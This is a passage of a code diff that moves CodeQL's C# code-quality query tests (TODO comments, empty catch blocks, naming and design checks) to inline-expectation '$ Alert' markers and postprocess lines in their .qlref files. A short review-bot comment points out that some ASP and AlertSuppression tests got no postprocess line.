@@ -26,13 +26,13 @@ public void IgnoreOne() if (DoPrint("I")) Console.WriteLine("I"); - DoPrint("J"); + DoPrint("J"); // $ Alert } void IgnoreRead(string path) { var file = new byte[10]; using (var f = new FileStream(path, FileMode.Open)) - f.Read(file, 0, file.Length); + f.Read(file, 0, file.Length); // $ Alert } } diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref index 40da4c8a2d57..b0835a02ad78 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref @@ -1 +1 @@ -ASP/BlockCodeResponseWrite.ql +query: ASP/BlockCodeResponseWrite.ql diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref index 85395099ce9a..90a69bb4a3b8 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref @@ -1 +1 @@ -ASP/ComplexInlineCode.ql +query: ASP/ComplexInlineCode.ql diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref index 16700623f76e..ac1b3e989b4c 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref @@ -1 +1 @@ -ASP/NonInternationalizedText.ql +query: ASP/NonInternationalizedText.ql diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref index 4e98f2ecbaa5..c02b4a97ae47 100644 
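Review bot: BlockCodeResponseWrite.qlref is rewritten to the `query:` form but gets no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line, unlike the API Abuse qlrefs earlier in this patch. The same holds for ComplexInlineCode.qlref, NonInternationalizedText.qlref, SplitControlStructure.qlref and AlertSuppression.qlref. Nothing in the visible change says whether these tests were left out of inline expectations on purpose. If it is deliberate, a sentence in the PR description naming the excluded directories and the reason would keep a later contributor from treating them as missed. If it is not, the line to add is `postprocess: utils/test/InlineExpectationsTestQuery.ql`, together with `$ Alert` markers in the test sources.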
--- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref @@ -1 +1 @@ -ASP/SplitControlStructure.ql +query: ASP/SplitControlStructure.ql diff --git a/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 1641277045f7..dc898fca718c 100644 --- a/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql \ No newline at end of file +query: AlertSuppression.ql diff --git a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref index ab1dbe353ef6..273ed4d757a6 100644 --- a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref +++ b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref @@ -1 +1,2 @@ -Architecture/Dependencies/MutualDependency.ql \ No newline at end of file +query: Architecture/Dependencies/MutualDependency.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs index 370b75b45890..4aeddea95ba8 100644 --- a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs +++ b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs @@ -1,6 +1,6 @@ public class Bad { - private class BadModel + private class BadModel // $ Alert { private int i; private BadView view; 
diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref index 9a63a65cd867..6931ecc2f7ec 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/FeatureEnvy.ql \ No newline at end of file +query: Architecture/Refactoring Opportunities/FeatureEnvy.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs index 15678d585760..a3f064ff746c 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs @@ -13,7 +13,7 @@ class Item class Basket { - decimal GetTotalPrice(Item i) + decimal GetTotalPrice(Item i) // $ Alert { if (i.IsOutOfStock) throw new Exception("Item ${i} is out of stock."); diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs index 95ff360b3d88..19ce015cdb54 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs @@ -2,7 +2,7 @@ class InappropriateIntimacy { - class A + class A // $ Alert { public int F1; public int F2; 
@@ -25,7 +25,7 @@ int M(B b) => b.F1 + b.F2 + b.F3 + b.F4 + b.F5 + b.F6 + b.F7 + b.F8 + b.F9 + b.F10 + b.F11 + b.F12 + b.F13 + b.F14 + b.F15 + b.F16; } - class B + class B // $ Alert { public int F1; public int F2; diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref index 3b1c4aa5b018..938449179aef 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/InappropriateIntimacy.ql \ No newline at end of file +query: Architecture/Refactoring Opportunities/InappropriateIntimacy.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs index 93575ea6d8b2..615ec177059e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs @@ -23,5 +23,5 @@ class Class // int y=3; // Comment // int z=4; // Comment // - // end of example + // end of example // $ Alert } diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref index 99318fe478e5..59b1ba27b8e2 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref 
@@ -1 +1,2 @@ -Bad Practices/Comments/CommentedOutCode.ql +query: Bad Practices/Comments/CommentedOutCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs index e4f13bb4c64c..2f38e3f42166 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs @@ -1,8 +1,8 @@ class C { - // BAD: A TODO comment - // BAD: A FIXME comment + // BAD: A TODO comment // $ Alert + // BAD: A FIXME comment // $ Alert // GOOD: A normal comment // GOOD: Lowercase todo fixme } diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref index b9114382c5b6..6cdc7b06d6e3 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref @@ -1 +1,2 @@ -Bad Practices/Comments/TodoComments.ql +query: Bad Practices/Comments/TodoComments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs index 172305a3bc73..7a02282cbcca 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs @@ -4,7 +4,7 @@ class Bad { public static double SolveQuadratic(double a, double b, double c) { - // TODO: handle case where a == 0 + // TODO: handle case where a == 0 // $ Alert return (-b + Math.Sqrt(b * b - 4 * a * c)) / (2 * a); } } 
diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref index 3984405db6bd..b2b0cf600bce 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/EmptyInterface.ql \ No newline at end of file +query: Bad Practices/Declarations/EmptyInterface.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs index 00f577a62a4f..09fcf1003d71 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs @@ -2,6 +2,6 @@ class Bad { - interface IsPrintable { } + interface IsPrintable { } // $ Alert class Form1 : IsPrintable { } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs index cf3062f8af65..a1d2cf846097 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs @@ -4,13 +4,13 @@ class C { protected int f; - protected virtual void M1(int f) { } // BAD + protected virtual void M1(int f) { } // BAD // $ Alert int M2(int f) => this.f + f; // GOOD void M3() { - var f = ""; // BAD + var f = ""; // BAD // $ Alert } void M4() 
@@ -23,13 +23,13 @@ struct S { int f; - void M1(int f) { } // BAD + void M1(int f) { } // BAD // $ Alert int M2(int f) => this.f + f; // GOOD void M3() { - var f = ""; // BAD + var f = ""; // BAD // $ Alert } void M4() @@ -45,9 +45,9 @@ interface I class C2 : C, I { - protected override void M1(int f) { } // BAD + protected override void M1(int f) { } // BAD // $ Alert - public void M5(int f) { } // BAD + public void M5(int f) { } // BAD // $ Alert } class C3 : C, I diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref index 913445e68f24..d7d02b3a9b8d 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/LocalScopeVariableShadowsMember.ql \ No newline at end of file +query: Bad Practices/Declarations/LocalScopeVariableShadowsMember.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs index 80ce45469375..d2be18995763 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs 
@@ -7,7 +7,7 @@ class Bad public void DisplayDetails() { - var title = "Person Details"; + var title = "Person Details"; // $ Alert var message = "Title: " + title + "\nName: " + name; MessageBox.Show(message, title); } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs index 0d7d15b56532..0fa96bccb0f2 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs @@ -2,7 +2,7 @@ class NoConstantsOnly { - abstract class MathConstants + abstract class MathConstants // $ Alert { public const double Pi = 3.14; // BAD } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref index 3b7e478699de..b46263c9d51a 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/NoConstantsOnly.ql \ No newline at end of file +query: Bad Practices/Declarations/NoConstantsOnly.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs index 28f308546ad6..cd92eabd7cf1 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs 
@@ -2,7 +2,7 @@ class Bad { - abstract class MathConstants + abstract class MathConstants // $ Alert { public static readonly double Pi = 3.14; } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref index 867e4e929bd0..37d7e6ce81ee 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/TooManyRefParameters.ql \ No newline at end of file +query: Bad Practices/Declarations/TooManyRefParameters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs index 08da4c6c3345..2d8f65570eea 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs @@ -2,7 +2,7 @@ class Bad { - private static void PopulateDetails(ref string name, ref string address, ref string tel) + private static void PopulateDetails(ref string name, ref string address, ref string tel) // $ Alert { name = "Foo"; address = "23 Bar Street"; diff --git a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs index e57deea7f3d1..812c271e1762 100644 --- a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs +++ b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs 
@@ -9,7 +9,7 @@ void bad() } catch (Exception) { - } + } // $ Alert } void good() diff --git a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref index 734bb1cadf90..3ba3a0114731 100644 --- a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref @@ -1 +1,2 @@ -Bad Practices/EmptyCatchBlock.ql \ No newline at end of file +query: Bad Practices/EmptyCatchBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs index 795952a82055..7e13d2843edb 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs @@ -4,7 +4,7 @@ class AbstractToConcreteCollection { void M(IEnumerable strings) { - var list = (List) strings; // BAD + var list = (List) strings; // BAD // $ Alert var o = (object) strings; // GOOD } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref index 307c259dbbb9..26e061e5206e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref 
@@ -1 +1,2 @@ -Bad Practices/Implementation Hiding/AbstractToConcreteCollection.ql \ No newline at end of file +query: Bad Practices/Implementation Hiding/AbstractToConcreteCollection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs index 9538fb9d7a06..92b80ea94d73 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs @@ -5,7 +5,7 @@ class Bad public static void Main(string[] args) { var names = GetNames(); - var list = (List) names; + var list = (List) names; // $ Alert list.Add("Eve"); } diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs index 01b05a000278..073ae9086cfd 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs @@ -5,7 +5,7 @@ class ExposeRepresentation class Range { private int[] rarray = new int[2]; - public void Set(int[] a) { rarray = a; } + public void Set(int[] a) { rarray = a; } // $ Alert } public static void Main(string[] args) diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref index e8bd17759d48..eafb170539aa 100644 
--- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref @@ -1 +1,2 @@ -Bad Practices/Implementation Hiding/ExposeRepresentation.ql \ No newline at end of file +query: Bad Practices/Implementation Hiding/ExposeRepresentation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs index 221f906aa97f..ee56212d1737 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs @@ -15,7 +15,7 @@ public Range(int min, int max) } } - public int[] Get() => rarray; + public int[] Get() => rarray; // $ Alert } public static void Main(string[] args) diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs index 210be320a6ee..5a169d651286 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs 
@@ -10,13 +10,13 @@ class Program public static readonly int[] EmptyArray4; // GOOD: empty - public static readonly int[] NonEmptyArray1 = new int[] { 42 }; // BAD + public static readonly int[] NonEmptyArray1 = new int[] { 42 }; // BAD // $ Alert static readonly int[] NonEmptyArray2 = new int[] { 42 }; // GOOD: private - public static readonly int[] NonEmptyArray3; // BAD + public static readonly int[] NonEmptyArray3; // BAD // $ Alert - public static readonly int[] Array = new int[new Random().Next()]; // BAD + public static readonly int[] Array = new int[new Random().Next()]; // BAD // $ Alert static Program() { diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref index 8dcd9bf72bed..e49a055b5a5e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref @@ -1 +1,2 @@ -Bad Practices/Implementation Hiding/StaticArray.ql \ No newline at end of file +query: Bad Practices/Implementation Hiding/StaticArray.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs index fe035d4e4f1d..57d8f21c1956 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs @@ -1,6 +1,6 @@ class Bad { - public static readonly string[] Foo = { "hello", "world" }; + public static readonly string[] Foo = { "hello", "world" }; // $ Alert public static void Main(string[] args) { Foo[0] = "goodbye"; 
diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref index 3308ff3889ef..94d4dc04c64f 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref @@ -1 +1,2 @@ -Bad Practices/Naming Conventions/ConfusingMethodNames.ql +query: Bad Practices/Naming Conventions/ConfusingMethodNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs index 7ec82a410312..ead2f8d79fe9 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs @@ -1,6 +1,6 @@ class C1 { - int F() => 0; // BAD: Confusing + int F() => 0; // BAD: Confusing // $ Alert int f() => 0; int G() => 0; // GOOD: Same name int G(int x) => x; diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs index a5eb951e148a..052215a052be 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs 
@@ -3,14 +3,14 @@ class VariableNameTooShort { - int F; // BAD + int F; // BAD // $ Alert int Foo; // GOOD Func Func = _ => ""; - void M(int i /* BAD */, int[] args /* GOOD */) + void M(int i /* BAD */, int[] args /* GOOD */) // $ Alert { args.Select(x /* GOOD */ => x + 1); - Func func = x /* BAD */ => x + 1; + Func func = x /* BAD */ => x + 1; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref index 02458a1b30fc..c80ef4583b05 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref @@ -1 +1,2 @@ -Bad Practices/Naming Conventions/VariableNameTooShort.ql \ No newline at end of file +query: Bad Practices/Naming Conventions/VariableNameTooShort.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs index bf9b19c4a5c7..d3595dfb540f 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs @@ -4,7 +4,7 @@ class PathCombine { void bad() { - Path.Combine(@"C:\Users", @"C:\Program Files"); + Path.Combine(@"C:\Users", @"C:\Program Files"); // $ Alert } void good() diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref index eaf41d047402..db4baecbd0f7 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref 
